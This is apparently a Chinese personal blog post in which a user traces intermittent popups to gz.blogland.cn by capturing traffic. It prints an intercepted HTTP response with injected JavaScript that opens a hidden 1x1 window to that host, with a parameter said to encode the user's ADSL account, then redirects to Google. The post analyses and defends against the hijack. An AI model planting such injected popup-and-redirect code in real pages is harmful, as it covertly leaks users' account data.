来自gz.blogland.cn的袭击

——最近在家里用ADSL上网,如果用的浏览器是Maxthon时不时会打开http://gz.blogland.cn/…..
这样的页面,内容没有仔细看,但是总是感觉不爽,用FireFox到目前为止还没有类似情况,估计
是我的IE给劫持了?

——Ok,作为一个技术人员,我们分析一下这个问题。首先,这个页面在Maxthon上面打开没有
什么内容。直接访问gz.blogland.cn的话,是403错误。然后我去whois一把这个该死的网站的注
册信息吧:
域名 blogland.cn
域名联系人 李XX
注册者 深圳市傲X信息技术有限公司
然后到傲X的网站一看,一家跟移动、电信、联通、网通都有业务的公司,不用说了,答案已经
很清晰而且是欲言又止的那种啦。好,用Axis(是Java写过WebService的人都知道这个东西
是什么)自带的TCPMonitor工具做做监控。我们就监听一下访问www.google.com的请求。
好,把ADSL断掉,然后重新拨号上网,讲localhost的80端口作为监听www.google.com请
求,用IE访问google主页,好了,我们就可以从IE收回来的response上面看到如下恐怖的信
息:

HTTP/1.1 200 OK
Date: Mon, 31 Mar 2003 01:24:22 GMT
Server: Apache/2.0.43 (Unix)
Content-Type: text/html
Connection: close
<HTML><script language=”JavaScript”>
function newwin()
{var urlname;var win_attr;win_attr=’toolbar=no,menubar=no,scrollbars=no,status=no,location=no
,resizable=no,fullscreen=no,directories=no,width=1,height=1,top=5000,left=500
0′;window.open(‘http://gz.blogland.cn/ndatin.aspx?param=XXXX(略,其实是base64的编码,里面有我的ADSL帐号信息!)’,’ips_win0′,win_attr);
}
</script>
<head><title></title><META HTTP-EQUIV=”Pragma” CONTENT=”no-cache”><META http-equiv=”Content-Type” content=”text/html;charset=gb2312″><meta http-equiv=”Refresh” content=”0; url=http://www.google.com/”></head><body onload=’newwin()’> </body></html>

稍微回一点JavaScript的人都知道这个是什么回事了吧?我从浏览器发出一个访问www.google.com
的请求,然后回返回一个弹出新窗口到gz.blogland.cn而且在本窗口自动跳转到原定目标,可
想而知,我的请求在那里给人拦截且修改了。拙劣卑鄙的手段,不想多说,不想继续查下去了,
无奈。唯一办法,改hosts文件,加入127.0.0.1 gz.blogland.cn,老子就是不给你发数据!

发表回复

您的电子邮箱地址不会被公开。 必填项已用 * 标注